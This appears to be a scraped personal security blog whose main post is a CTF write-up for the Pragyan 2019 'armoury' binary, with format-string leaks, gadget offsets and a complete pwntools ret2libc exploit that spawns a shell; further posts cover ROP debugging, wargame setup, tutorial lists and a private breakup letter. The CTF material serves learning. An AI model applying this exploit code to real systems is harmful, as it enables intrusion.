반응형

armoury


0. Some pre-requisites: 


- It's nice to have gdb-peda and pwntools.

- Knowledge on buffer overflow and ret2libc. 

- Knowledge of 64-bit environments and its difference from 32-bit environments (optional)
- "scanf will quite happily read null bytes. it only stops at white space - strcpy/strcat are the functions you should worry about null bytes" -brx


P.S: How to set ASLR on on gdb (turns off every instance):

set disable-randomization off


This writeup is based on Naivenom's writeup from the CTF which can be found here.




1. Examining the program


When we boot up the program, we can clearly see the program has a format string bug:


chanbin_lee123@linux:~$ ./armoury

*******Rifle Database**************


Enter the name of Rifle to get info:

%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p


----------------DATA-------------------

0x7fa5447c5683.0x7fa5447c6760.0x7fa544506970.0x7fa5449e7440.(nil).0x1.0x1dbcdbced.0x252e70252e702500.0x2e70252e70252e70.0x70252e70252e7025.0x252e70252e70252e.0x2e70252e70252e70.0xc8316ab63d007025.0x5622dbcdbca0:

Sorry... We dont have any information about %p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p

---------------------------------------


Enter the name of Rifle to get info:

^C


As per the bolded text, we can see that there are some addresses leaking (we will observe this later), and then further, the material in the stack highlighted in red. We can observe that the stack information is leaked from the 9th argument (after 9 "%p"s). 


Let's check the security on the program.


chanbin_lee123@linux:~$ gdb -q armoury

Reading symbols from armoury...(no debugging symbols found)...done.

gdb-peda$ checksec

CANARY    : ENABLED 

FORTIFY   : disabled

NX        : ENABLED

PIE       : ENABLED

RELRO     : FULL


Canary (Stack Smashing Protector, Cookie): A null-byte terminated string that is located before the saved stack frame pointer (RBP) and return address (RET). This is a value that the program compares to its original value (__stack_chk_fail)  before it returns. If this value is overwritten because of a buffer overflow vulnerability, the program will realize that it will not be safe to continue and will terminate the program.


NX: Non-executable bit - you will not be able to execute any kind of shellcode by placing them on the stack. 


ELF: Executables and Linkable Format


PIE: Position Independent Executable - All the sections of the program are randomly loaded into memory. (This includes the .data and .code section of the program). But, since the PIE only changes the executable's base address, you will be able to see that if you execute the command "objdump -d <ELF executable>" the output will only give offsets. And these offsets are static!


ASLR (non-PIE): Changes the position of stack, heap, library (but the main executable will get loaded in the same address.) 

RELRO: Basically a full RELRO means that you won't be able to do anything like a GOT overwrite.




2. Gathering materials


What we need:
- Leaked canary

- Gadget (pop rdi; ret)

- Three libc addresses:

- base of libc

- (offset to) system()

- (offset to) "/bin/sh"


2.1. Getting the Canary


So, we already know from the first format string bug, that we are able to access information on the stack.

I first put a breakpoint in main (using the b *main command) and ran the program, giving "BBBB" as the input. 

At the breakpoint, we can investigate the value of $rsp to see what we have.



As you may observe, we have BBBB (0x42424242) on the stack. We can also see the canary (ending with a null byte), the saved RBP, and return address, all highlighted above.


The canary is located right before the stack frame pointer. As we know that the stack is leaked after 9 %ps, we can conclude that the canary is the 13th argument, the sfp is 14th, and the return address is the 15th argument we can receive from our format string.


2.2. Getting the ELF base address



When we observe the saved RBP, we can see that if we null the last three bytes out, we will be able to get the base ELF address. 

This will be useful to us when we obtain our gadget as offsets from the base address.


2.3. Getting the LIBC base address

Breakpoint at giveInfo to set a stop, so that we can observe the registers and addresses. (b giveInfo)

Run the program. (r)



There we can see the address we get from executing scanf("%3$p"); (third argument of the output)



If we take a look at our third argument that gets leaked, we can use that leaked address to get the offset to our libc as shown above. We need grab a few more values too.


gdb-peda$ p 0x7ffff7b15970-0x00007ffff7a3a000 

$1 = 0xdb970


gdb-peda$ p system

$2 = {<text variable, no debug info>} 0x7ffff7a79480 <__libc_system>


gdb-peda$ p 0x7ffff7a79480 -0x00007ffff7a3a000 

$3 = 0x3f480


We see that:

%3$p: Address of <__write_nocancel+7>

Offset to libc: 0xdb970

Offset from libc to system: 0x3f480


--> %3$p - offset to libc + offset from libc to system = address of system (in libc)


2.4. Address of "/bin/sh"


gdb-peda$  find "/bin/sh"

Searching for '/bin/sh' in: None ranges

Found 1 results, display max 1 items:

libc : 0x7ffff7b9bc19 --> 0x68732f6e69622f ('/bin/sh')


gdb-peda$ p 0x7ffff7b9bc19 -0x00007ffff7a3a000 

$4 = 0x161c19


2.5. ROP Gadgets (pop rdi; ret)


chanbin_lee123@instance-2:~$ ROPgadget --binary armoury

Gadgets information

============================================================

0x0000000000000d03 : pop rdi ; ret




3. POC


BUFFER [24]

CANARY [8]

DUMMY [8]

POP RDI; RET [8]

ADDRESS OF "/BIN/SH" [8]

ADDRESS OF SYSTEM() [8]


(Basic ret2libc structure)




4. Exploit Rundown


Full exploit can be found in the next section.

I'll try my best to explain everything. T_T Please ask if you don't understand something.


1
2
3
4
5
payload = ""
 
r.recvuntil("Enter the name of Rifle to get info:\n")
r.send("%3$p.%13$p.%14$p\n"# libc address, canary, saved rbp
 
cs

We want the 3rd, 13th and 14th arguments so we leak those.


1
2
3
4
5
6
leak = r.recvuntil(":").replace(":""").split(".")
leaked_libc = int(leak[0], 16)
 
offset_to_libc = 0xdb970
offset_to_system = 0x3f480
offset_to_binsh = 0x161c19
cs

Once we receive the leaks, we split the string regarding '.'

leak[0] = 3rd argument, leak[1] = canary, leak[2] = sfp

I also save the offsets I have.


1
2
3
libc_addr = leaked_libc - offset_to_libc
system_addr = libc_addr + offset_to_system
binsh_addr = libc_addr + offset_to_binsh
cs
Calculate all the addresses I need using the offsets. If any of these calculations don't make sense, refer back to section 2.3 - I've explained a little bit there.

1
2
3
4
5
6
canary = int(leak[1], 16)
leaked_elf = int(leak[2], 16)
elf_addr = leaked_elf - (leaked_elf & 0xfff)

offset_pop_rdi = 0xd03
pop_rdi = elf_addr + offset_pop_rdi
cs

I also cast the canary to int here, and calculate the ELF base address.

If you do a &0xfff operation, you get the last three bytes of a number - so we can just subtract this from the original address and we get the base address.


1
2
3
4
5
6
7
payload += "A"*24 # Fill up the buffer
payload += p64(canary) # Canary
payload += "B"*8 # Overwrite saved RBP
payload += p64(pop_rdi)
payload += p64(binsh_addr)
payload += p64(system_addr)
payload += "\n"
cs

As written above (POC) this is the generic ret2libc payload. Since the argument to system() is passed on through RDI we load the address of /bin/sh on RDI (using pop rdi) and call system().




5. Full Exploit


1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
from pwn import *
 
= process("./armoury")
 
payload = ""
 
r.recvuntil("Enter the name of Rifle to get info:\n")
r.send("%3$p.%13$p.%14$p\n"# libc address, canary, saved rbp
 
r.recvuntil("----------------DATA-------------------\n")
 
leak = r.recvuntil(":").replace(":""").split(".")
leaked_libc = int(leak[0], 16)
 
offset_to_libc = 0xdb970
offset_to_system = 0x3f480
offset_to_binsh = 0x161c19
 
libc_addr = leaked_libc - offset_to_libc
system_addr = libc_addr + offset_to_system
binsh_addr = libc_addr + offset_to_binsh
 
print "libc address: " + hex(libc_addr)
print "system address: " + hex(system_addr)
print "binsh address: " + hex(binsh_addr)
 
canary = int(leak[1], 16)
leaked_elf = int(leak[2], 16)
elf_addr = leaked_elf - (leaked_elf & 0xfff)
 
print "canary: " + hex(canary)
print "elf address: " + hex(elf_addr)
 
offset_pop_rdi = 0xd03
pop_rdi = elf_addr + offset_pop_rdi
 
payload += "A"*24 # Fill up the buffer
payload += p64(canary) # Canary
payload += "B"*8 # Overwrite saved RBP
payload += p64(pop_rdi)
payload += p64(binsh_addr)
payload += p64(system_addr)
payload += "\n"
 
r.recvuntil("Enter the name of Rifle to get info:\n")
r.send("AAAA\n")
 
r.recvuntil("Would you like to give us some feedback:\n")
r.send(payload)
 
r.interactive()
cs


반응형

'CTF > Writeup' 카테고리의 다른 글

Google Code Jam 2019 Qualification Rounds  (1) 2019.04.08
[Pragyan 2019] armoury [KR]  (0) 2019.03.22
[Pragyan 2019] armoury  (0) 2019.03.21
반응형

Hey.


It's been a long year and a half. Two years, I should say.


You know, it's been only a day and I've been suffering so much. It's definitely less suffering than this whole week's worth of my suffering, so it's okay, but it's not okay. If I'm the one who dumped you, why am I so sad? Funny. 

I've been thinking and I still had a lot to say on my mind that I couldn't tell you yesterday. 


This is a closure letter for you and for myself.


Wow, I've actually ended the relationship. I can't believe it.

I guess now I've come to realize it was actually a huge part of my life.

If anything, I wish that you wouldn't think that I ended the relationship because I loved you any less than I used to.

(Which is sad. I know. But I'm a reasonable person. For your career, for my mental health, this had to end and I think we can both agree on that.) 


It's not your fault. You should realize that. Yes, it is your fault you can only prioritize your career above me. 

But that's the right thing for you, and that's not something to feel guilty for. We just weren't meant to be.

We're barely 20. The fact that you have your life prioritized is something you should be proud of. 

You're a special person to me that will never be able to get replaced by anyone else. I don't know if it's our time spent together, or everything we've shared with one another.


I was scared that I would drag on the relationship with false hopes and tire everyone out. I didn't want to hurt anyone, you or me, so I had to go ahead.

It might have been a bad choice. I regret maybe a little bit...but I really think it was the best choice for us long term.

There are many chances in life. Life moves on. 


I miss the old times when we were really close friends. So I went ahead and read our past messages because clearly I can't get over anything.

It surprised me how much we've changed. Our core and humor might not have changed, but the way we talk, the way we communicate.. It's all different now.

It made me a bit sad that maybe that we might not be able to go back to our previous selves. 


But we've grown as people. We're different people now.

We were both high school students, and we're both at university now pursuing something different than what we had originally planned for. 

Our lives will change so much over the next few years. Crazy, huh?


I don't know what I should do with the things that remind me of you. 

What about the things that never made it to you? How do I get rid of them? 

The 30 cards I wrote that never made their way to you? The presents? 


How do I survive this week without you? 


I've decided to call it a 'pause' - I'll let everything be, until I rack up the courage to put them away somewhere, to do something with them. 

As of now, I have no idea what to do with them and I have no motivation.. I feel alone in this world. But I'll eventually get better.


How was your first day of lectures? Labs? 

I wanted to be a part of your university life and growth, someone you could get support from. 

But that can't happen anymore and you didn't need my support anymore. 


Now that that's done with, I feel like our relationship could have gone better. I could have taken things more lightly. It could have been a break instead of a break-up. Less commitment. We could still have been 'together'. But that's not respectful to both you and me and everything we've went through together. There would be this awkward dying relationship lingering on, hindering both of us. At that point, is it even a relationship anymore? I know because I spent the whole last week thinking about it. It's better to move on when we both still like each rather than wait for guilt and resent to build up.


You know what I realized? We were on different pages. I didn't need you to provide anything, I wasn't missing out on anything, if that's what you worried about. I just needed communication and that's all. I don't know whether you thought you were limiting me in terms of options and chances, but that doesn't really matter when I'm not actively looking for a relationship. I was good with having only you by my side but you never understood and never gave me the communication I needed.


Any thought of this "could've gone better" is an illusion of a breakup. I wasn't happy with the relationship, you weren't. I just don't remember that bad feeling anymore because of your empty space. I really don't remember anything bad, maybe I could have endured it -- but I know you weren't emotionally available to take all my burden either. Expecting that from you would be rude of me, and quite frankly speaking, I'd like to think you were tired of my shit by the end of it too.


I vaguely remember, I didn't feel loved by the end. I felt neglected and ignored most of the time. Our communication ceased, your "I love you"s ceased. You stopped reading my messages. Did you notice that? Even if you read my messages, you never finished reading them, unlike before. I could have dealt with it but I think I've had my fair share of communication issues. It was like talking to a wall. I would like to think it was the stress getting to you transitioning into university, business, whatever, and I'm sorry for leaving you behind during the pressurizing times. But I wasn't willing to continue a relationship with someone I didn't feel loved with. Something didn't feel right. We weren't communicating enough, and I can't survive with someone knowing that I am not the priority in their lives. I didn't feel like I was getting what I needed, you were right. 


I tried my best, I know you did too. Thank you for that. Thank you for trying in the first place. We knew that this might not work out since the very beginning, but we decided to try it out. And that's all that matters. Because it was worth it.

It was the first time in my life where I felt appreciated for who I really was.

Me being able to become a more cheerful and outgoing person at university is partially thanks to you. 

I learned how to become vulnerable at times. More open-minded. And how to stay comfortable with myself being emotionally vulnerable.  


And I know you're going to be successful. Because you will be.

I hope you've learned more things about yourself too. I'm sorry I had to hurt you at the end. 


I know for myself that we both have to move on. I'll take some time to myself to build myself back up. 

I'll be able to move on. Meet someone better suited. Take care of myself, now that I've learned.


You know, since the very beginning, it's like you predicted this to happen. 

You started the relationship by you saying "We can and should have these romantic chats and whatever couples do, But at the end of the day, I would prefer us to be more like BFFs." We just didn't think it through and kinda became a solid couple which kinda ended bad, but, doesn't change the fact that you called it since the beginning, I feel like you should be a fortuneteller. 

You're always right btw. Not saying that as a joke but things you say eventually happen. :-)


We might have been the best for each other, we won't know. 

I truly believe that we had a relationship that no one else could understand (cheesy but the truth).

I don't have to regret anything we did, and this relationship as a whole, because all the memories I had with you were surely the happiest moments of my life. If we're meant to be, fate will put us back on the same path.


I have to heal. I have to make decisions for myself. We both didn't fit in terms of expectations and what we could do. 

One day, I might just be a more stable person with more confidence in my own career and life, more control over everything, and the same type of relationship might be possible just because we've grown up.


But I don't think that's what I want as of now. I'm too young, too immature, too fragile. 

You'll be able to meet someone if you treat them with everything you've treated me with, and I believe in my words. You should believe in yourself too.

Someone more understanding of your schedule. Someone who loves you as much as I did. Someone who is okay about not being a priority.


And that's what I hope you'll do. Even if you don't want to, I want you to move on. 

Because I realized that the person I used to love isn't available anymore. I barely recognize you now, all busy, prioritizing many different things over our relationship. We've all moved on in our own ways and that's not a bad thing. Maybe if I loved you enough I would be happy with you making new connections, learning new things, not being available and I wonder if it's a fault on my end too.


Even if we, per any chance, get back together in the future, it will not be the you and me we started off with in 2017. 

It will be the you and me in the future as two different people. Because unfortunately me and you of 2017 to 2019 didn't work out big time.


I want myself to move on. I'm doing well. 

Next time you see me, I'll introduce myself again as a new person because I will be a different person by then.

And I hope you will too. 


So good bye, my ex and bestie.

Thank you for everything. 


Farewell! Till next time. :)




반응형

'BLOG > DIARY' 카테고리의 다른 글

[모나미] 홍보책자로 다이어리 꾸미기  (0) 2020.10.04
20190530 Today's rant  (0) 2019.05.30
A letter to my best friend  (0) 2019.02.25
Why you should write documentation  (0) 2019.02.17
Reminder not to click on shady urls.  (0) 2019.02.10
20180414 Today's Rant  (0) 2018.04.14
반응형

Print your payload:

print payload


Pipe it into a file:

EverTokki@pico-2018-shell:~/rop$ python test.py > input


Breakpoint where your program returns:

EverTokki@pico-2018-shell:~/rop$ gdb -q gets

Reading symbols from gets...(no debugging symbols found)...done.

gdb-peda$ b *0x080488a2

Breakpoint 1 at 0x80488a2


Run it with your payload:

gdb-peda$ r < input

Starting program: /home/EverTokki/rop/gets < input

GIVE ME YOUR NAME!


Display your current pc (instruction): 

Breakpoint 1, 0x080488a2 in vuln ()

gdb-peda$ disp/3i $pc 

1: x/3i $pc

=> 0x80488a2 <vuln+38>: ret    

   0x80488a3 <main>: lea    ecx,[esp+0x4]

   0x80488a7 <main+4>: and    esp,0xfffffff0


Step into instructions:
gdb-peda$ si


Keep watching your registers and note when it screws up.


반응형

'STUDY > Documentation' 카테고리의 다른 글

Simple BOF Problem  (0) 2019.04.10
Debugging your ROP  (0) 2019.02.18
해커스쿨 문서 백업 (Syshacks)  (0) 2019.02.17
Bufferoverflow 기법 정리  (0) 2015.09.22
핸드레이  (0) 2015.09.05
strace, 제가 한번 사용해 보겠습니다.  (0) 2014.07.22
반응형

Learning something is pretty difficult in security. It has a steep learning curve for sure. There are a lot of resources online - but just not enough. (Even moreso if you compare it to the amount of computer science resources there are, I feel like we just lack a variety) After some point, the attacks get sophisticated, but you can't really learn from anything, you'll have to research vulnerabilities by yourself. My friend's also expressed a concern about how he felt so standalone in the field whenever he tried to learn something new.

Of course, we could attend conferences, but it would be better if documentation was just available online.


That's why you need to write documentation. Whether that be a short, easy way to do things, or a really complicated method, writing it down will help someone else. Writing it down will help yourself. You'll get to remember more, understand more, and share your knowledge along the way.


I hope to write some docs over the next few months too.

Share your knowledge. Sharing is caring.


반응형

'BLOG > DIARY' 카테고리의 다른 글

20190530 Today's rant  (0) 2019.05.30
A letter to my best friend  (0) 2019.02.25
Why you should write documentation  (0) 2019.02.17
Reminder not to click on shady urls.  (0) 2019.02.10
20180414 Today's Rant  (0) 2018.04.14
20171215 Today's rant  (0) 2017.12.16
반응형

Double_Staged_Format_String_Attack__pwn3r.pdf

Olly Debugger 사용 방법 강좌 2부.hwp

bof_fsb.hwp

remote_overflow2.pdf

remote_overflow1.pdf

code_exec.pdf

Olly Debugger 사용 방법 강좌 1부.hwp

asm_beginner.pdf

buf_overflow_techniques.pdf

fsb_howto.pdf

craft_shellcode.pdf

exploit_using_unfinished_str.pdf

fileread_race.pdf

datastructures.pdf

fsb원리.pdf

semaphores.pdf

fsb.pdf

ret-t-lib.pdf

BOF_strace.hwp


약간 유통기간(?)이 지난 문서들도 있겠지만 읽을 문서들이 필요했고,

해커스쿨 플래시 인터페이스는 2005년에는 멋있었겠지만 2019년에는 경악을 금치 못하는 수준이라

슬며시 재미있어보이는것들만 따와서 여기 올린다.


https://www.hackerschool.org/HardwareHacking/

여기도 재미있어보이지만 하드웨어는 일단 소프트웨어부터 익숙해진 후에 시도해보려 한다.

흠..배고프다

반응형

'STUDY > Documentation' 카테고리의 다른 글

Simple BOF Problem  (0) 2019.04.10
Debugging your ROP  (0) 2019.02.18
해커스쿨 문서 백업 (Syshacks)  (0) 2019.02.17
Bufferoverflow 기법 정리  (0) 2015.09.22
핸드레이  (0) 2015.09.05
strace, 제가 한번 사용해 보겠습니다.  (0) 2014.07.22
반응형

http://phishinginfo.weebly.com/
A trip down memory lane.

Don't get baited, save your privacy.


Here's a ppt I made 6 years ago:


phishingmethods.pptx


반응형

'BLOG > DIARY' 카테고리의 다른 글

A letter to my best friend  (0) 2019.02.25
Why you should write documentation  (0) 2019.02.17
Reminder not to click on shady urls.  (0) 2019.02.10
20180414 Today's Rant  (0) 2018.04.14
20171215 Today's rant  (0) 2017.12.16
20171127 Today's rant  (0) 2017.11.27
반응형

It's finally time. I've always thought about translating this post but I finally get to do it now.


[What is Lord of the BOF?]

From a relatively easy environment, Redhat 6.2 to the ultimate Fedora 14 -

You'll have to go through numerous levels and show off your BOF skills.


Solve the highest level and shoot me an email at chanbin.lee123@gmail.com with a writeup of the death_knight challenge - I'll send you the Fedora image file.


[How to]

Lord of the BOF is given as a vmware image so that you'll have your own environment to connect into and play.


[Download]

1. Download the following vmware image and boot up!

http://hackerschool.org/TheLordofBOF/TheLordOfTheBOF_redhat_bootable.zip

2. Login with credentials: gate/gate

3. Set up your network settings through netconfig (There's a setuid set on the system)

4. Check your ip. (/sbin/ifconfig)

5. Use something like putty or xshell to connect(telnet) to the image and start hacking. 


[Basic Rules]

1. No single boot

2. No root exploit

3. NOT allowed to use LD_PRELOAD on the /bin/my-pass command


[How to check your next level's password]

/bin/my-pass


[List of Levels]


LEVEL1 (gate -> gremlin) :  simple bof

LEVEL2 (gremlin -> cobolt) : small buffer

LEVEL3 (cobolt -> goblin) : small buffer + stdin

LEVEL4 (goblin -> orc) : egghunter

LEVEL5 (orc -> wolfman) : egghunter + bufferhunter

LEVEL6 (wolfman -> darkelf) : check length of argv[1] + egghunter + bufferhunter

LEVEL7 (darkelf -> orge) : check argv[0]

LEVEL8 (orge -> troll) : check argc

LEVEL9 (troll -> vampire) : check 0xbfff

LEVEL10 (vampire -> skeleton) : argv hunter

LEVEL11 (skeleton -> golem) : stack destroyer

LEVEL12 (golem -> darkknight) : sfp 

LEVEL13 (darkknight -> bugbear) : RTL1

LEVEL14 (bugbear -> giant) : RTL2, only execve

LEVEL15 (giant -> assassin) : no stack, no RTL

LEVEL16 (assassin -> zombie_assassin) : fake ebp

LEVEL17 (zombie_assassin -> succubus) : function calls

LEVEL18 (succubus -> nightmare) : plt

LEVEL19 (nightmare -> xavis) : fgets + destroyers

LEVEL20 (xavis -> death_knight) : remote BOF 



반응형

'STUDY > Lord of the BOF' 카테고리의 다른 글

Lord of the BOF  (0) 2019.02.07
xavius->death_knight  (0) 2014.07.31
nightmare->xavius  (0) 2014.07.22
succubus->nightmare  (0) 2014.07.10
zombie_assassin->succubus  (0) 2014.07.08
assassin->zombie_assassin  (2) 2014.06.26
반응형

Name | Chanbin Lee (EverTokki)

Major | Computer Science

Hobbies | Drawing, CTF, osu!



(I really like bulbasaurs)


I like making stuff, breaking stuff..

But I write posts about breaking stuff more than making stuff.


I've competed with:

2013.09 - 2015. 01: 🇰🇷 Team LeaveRet

2019. 02: 🇨🇦 Team Maple Bacon

반응형

'PROFILE' 카테고리의 다른 글

Welcome to my blog!  (0) 2019.02.07
[osu!] kai99's profile  (0) 2017.03.23
초대장 배포합니다 [完]  (16) 2013.07.03
에버토끼의 블로그 오픈!  (0) 2013.01.19

+ Recent posts